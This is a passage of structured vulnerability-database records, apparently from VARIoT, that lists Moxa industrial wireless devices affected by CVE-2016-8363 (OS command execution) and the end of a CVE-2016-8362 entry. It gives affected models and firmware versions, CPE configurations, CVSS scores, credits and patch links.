"id": "JVNDB-2016-007996"
},
{
"db": "NVD",
"id": "CVE-2016-8362"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"date": "2017-02-13T00:00:00",
"db": "VULHUB",
"id": "VHN-97182"
},
{
"date": "2017-02-13T00:00:00",
"db": "VULMON",
"id": "CVE-2016-8362"
},
{
"date": "2016-11-03T00:00:00",
"db": "BID",
"id": "94092"
},
{
"date": "2017-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"date": "2017-02-13T21:59:01.050000",
"db": "NVD",
"id": "CVE-2016-8362"
},
{
"date": "2016-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-10731"
},
{
"date": "2017-03-16T00:00:00",
"db": "VULHUB",
"id": "VHN-97182"
},
{
"date": "2017-03-16T00:00:00",
"db": "VULMON",
"id": "CVE-2016-8362"
},
{
"date": "2016-11-24T01:07:00",
"db": "BID",
"id": "94092"
},
{
"date": "2017-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-007996"
},
{
"date": "2017-03-16T15:12:26.133000",
"db": "NVD",
"id": "CVE-2016-8362"
},
{
"date": "2016-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Moxa OnCell Vulnerability in downloading log files in series products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-007996"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-108"
}
],
"trust": 0.6
}
}
VAR-201702-0072
Vulnerability from variot - Updated: 2023-12-18 13:48An issue was discovered in Moxa OnCell OnCellG3470A-LTE, AWK-1131A/3131A/4131A Series, AWK-3191 Series, AWK-5232/6232 Series, AWK-1121/1127 Series, WAC-1001 V2 Series, WAC-2004 Series, AWK-3121-M12-RTG Series, AWK-3131-M12-RCC Series, AWK-5232-M12-RCC Series, TAP-6226 Series, AWK-3121/4121 Series, AWK-3131/4131 Series, and AWK-5222/6222 Series. User is able to execute arbitrary OS commands on the server. MOXAOnCell is an industrial grade IP gateway product. Moxa OnCellG3470A-LTE etc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201702-0072",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "oncellg3470a-lte",
"scope": null,
"trust": 1.4,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232-m12-rcc",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-6232",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-1127",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-5232",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-3121-m12-rtg",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-3191",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-1121",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "wac-1001 v2",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "wac-2004",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-3131a",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-4131a",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-1131a",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-3131-m12-rcc",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "oncellg3470a-lte",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-1121",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-1127",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-1131a",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3121-m12-rtg",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3131-m12-rcc",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3131a",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3191",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-4131a",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232-m12-rcc",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-6232",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "wac-1001 v2",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "wac-2004",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5222/6222 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3131/4131 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3121/4121 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "tap-6226 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232-m12-rcc series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3131-m12-rcc series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3121-m12-rtg series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "wac-2004 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "wac-1001 series",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v2"
},
{
"model": "awk-1121/1127 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-5232/6232 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-3191 series",
"scope": null,
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "awk-1131a",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "10-31-2016"
},
{
"model": "awk-6232",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-3121-m12-rtg",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-5232",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "05-30-2017"
},
{
"model": "awk-5232-m12-rcc",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "wac-1001 v2",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-1121",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "wac-2004",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-1127",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "awk-3131-m12-rcc",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "06-29-2017"
},
{
"model": "wac-2004",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "wac-1001",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "v20"
},
{
"model": "tap-6226",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "oncellg3470a-lte",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-6232",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-6222",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-5232-m12-rcc",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-5232",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-5222",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-4131a",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-4131",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-4121",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3191",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3131a",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3131-m12-rcc",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3131",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3121-m12-rtg",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-3121",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-1131a",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-1127",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "awk-1121",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"db": "NVD",
"id": "CVE-2016-8363"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:oncellg3470a-lte_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10-31-2016",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:oncellg3470a-lte:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-4131a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10-31-2016",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-4131a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3191_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "05-30-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3191:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-5232_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "05-30-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-5232:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-6232_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "05-30-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-6232:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-1121_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-1121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-1127_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-1127:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:wac-1001_v2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:wac-1001_v2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:wac-2004_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:wac-2004:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121-m12-rtg_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121-m12-rtg:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3131-m12-rcc_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3131-m12-rcc:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-5232-m12-rcc_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "06-29-2017",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-5232-m12-rcc:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3131a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10-31-2016",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3131a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-1131a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10-31-2016",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-1131a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-8363"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Maxim Rupp",
"sources": [
{
"db": "BID",
"id": "94092"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
],
"trust": 0.9
},
"cve": "CVE-2016-8363",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-8363",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-10730",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-97183",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 10.0,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-8363",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-8363",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2016-10730",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201611-109",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-97183",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-8363",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"db": "VULHUB",
"id": "VHN-97183"
},
{
"db": "VULMON",
"id": "CVE-2016-8363"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"db": "NVD",
"id": "CVE-2016-8363"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in Moxa OnCell OnCellG3470A-LTE, AWK-1131A/3131A/4131A Series, AWK-3191 Series, AWK-5232/6232 Series, AWK-1121/1127 Series, WAC-1001 V2 Series, WAC-2004 Series, AWK-3121-M12-RTG Series, AWK-3131-M12-RCC Series, AWK-5232-M12-RCC Series, TAP-6226 Series, AWK-3121/4121 Series, AWK-3131/4131 Series, and AWK-5222/6222 Series. User is able to execute arbitrary OS commands on the server. MOXAOnCell is an industrial grade IP gateway product. Moxa OnCellG3470A-LTE etc",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-8363"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "VULHUB",
"id": "VHN-97183"
},
{
"db": "VULMON",
"id": "CVE-2016-8363"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-8363",
"trust": 3.5
},
{
"db": "ICS CERT",
"id": "ICSA-16-308-01",
"trust": 3.5
},
{
"db": "BID",
"id": "94092",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201611-109",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-10730",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-97183",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-8363",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"db": "VULHUB",
"id": "VHN-97183"
},
{
"db": "VULMON",
"id": "CVE-2016-8363"
},
{
"db": "BID",
"id": "94092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007997"
},
{
"db": "NVD",
"id": "CVE-2016-8363"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-109"
}
]
},
"id": "VAR-201702-0072",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10730"
},
{
"db": "VULHUB",
"id": "VHN-97183"
}
],
"trust": 1.6229144359999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10730"
}
]
},
"last_update_date": "2023-12-18T13:48:41.573000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.moxa.com/"
},
{
"title": "MoxaOnCellSeries product OS command execution vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/83629"
},
{
"title": "Moxa OnCell Repair measures for operating system command execution vulnerabilities in series products",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=65482"
},
{
"title": "Moxa OnCell Repair measures for operating system command execution vulnerabilities in series products",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=65335"
}
],
"sources": [
{
"db": "CNVD",
